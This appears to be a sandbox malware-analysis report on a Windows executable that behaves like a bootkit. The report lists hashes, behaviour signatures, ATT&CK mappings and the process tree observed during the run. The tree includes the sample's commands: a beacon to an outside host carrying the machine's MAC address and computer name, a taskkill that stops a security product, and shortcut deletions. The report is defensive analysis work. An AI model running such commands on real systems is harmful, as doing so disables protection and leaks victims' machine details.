Analysis

  • max time kernel
    175s
  • max time network
    196s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2022 14:59

General

  • Target

    4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe

  • Size

    66KB

  • MD5

    6a8a87bdde4c990495445537002b875d

  • SHA1

    f042ff475685cfb50660876ecabe777638985758

  • SHA256

    4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c

  • SHA512

    4f786f1e224ad52b82c54117da36927726e863a5850364f34b2dce65540140a38eb0e182119c3d021de089da33321177f9f7ad72a7e988ae43d855ff00840410

  • SSDEEP

    1536:A0AQ7vNqh8Ks9dFcQanJI3s0t2Jk6HuJAJr0eoKM:4Aqh8KWdVI2eu6O7T

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe
    "C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:228
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.5913.net/a/get.asp?mac=FAE5CAF40400&makedate=QM00013&comput=Home&ver=81&userid=0001
      2⤵
      • Modifies Internet Explorer settings
      PID:4280
    • C:\Windows\SysWOW64\hrdsoft.exe
      C:\Windows\system32\hrdsoft.exe C:\Users\Admin\AppData\Local\Temp\4d69b319b9aa132035a898915095643fdc571d601c7c8ade42887b24acc1077c.exe===
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1120
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im ZhuDongFangyu.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:896
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\google chrome.lnk
        3⤵
          PID:3384
        • C:\Windows\SysWOW64\rundll32.exe
          rundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\microsoft edge.lnk
          3⤵
            PID:452
          • C:\Windows\SysWOW64\rundll32.exe
            rundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\shows desktop.lnk
            3⤵
              PID:4472
            • C:\Windows\SysWOW64\rundll32.exe
              rundll32.exe advpack.dll,DelNodeRunDLL32 c:\users\admin\appdata\roaming\microsoft\internet explorer\quick launch\window switcher.lnk
              3⤵
                PID:4120

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          Bootkit

          1
          T1067

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          System Information Discovery

          1
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Windows\SysWOW64\hrdsoft.exe
            Filesize

            21KB

            MD5

            f43c6092eba273dae6b1adea10a8b6e1

            SHA1

            e4cbdfa66d74d0a10793df4c45c50c98da702081

            SHA256

            c50741ad9ef538177d76e7790aa2502870b51223324db72f183f73f414e349eb

            SHA512

            1cf83eb17597d26ca003cc63e97e96e703dcd39be5954a5dc256d4c6601e71b7a13fa756277015b3e325c3d4f14df6667f9310c7fb4bfa759eae71d684ce3f45

          • C:\Windows\SysWOW64\hrdsoft.exe
            Filesize

            21KB

            MD5

            f43c6092eba273dae6b1adea10a8b6e1

            SHA1

            e4cbdfa66d74d0a10793df4c45c50c98da702081

            SHA256

            c50741ad9ef538177d76e7790aa2502870b51223324db72f183f73f414e349eb

            SHA512

            1cf83eb17597d26ca003cc63e97e96e703dcd39be5954a5dc256d4c6601e71b7a13fa756277015b3e325c3d4f14df6667f9310c7fb4bfa759eae71d684ce3f45

          • memory/228-132-0x0000000000400000-0x0000000000423000-memory.dmp
            Filesize

            140KB

          • memory/228-141-0x0000000000400000-0x0000000000423000-memory.dmp
            Filesize

            140KB

          • memory/452-144-0x0000000000000000-mapping.dmp
          • memory/896-142-0x0000000000000000-mapping.dmp
          • memory/1120-135-0x0000000000000000-mapping.dmp
          • memory/1120-140-0x0000000000400000-0x0000000000414000-memory.dmp
            Filesize

            80KB

          • memory/1120-147-0x0000000000400000-0x0000000000414000-memory.dmp
            Filesize

            80KB

          • memory/3384-143-0x0000000000000000-mapping.dmp
          • memory/4120-146-0x0000000000000000-mapping.dmp
          • memory/4472-145-0x0000000000000000-mapping.dmp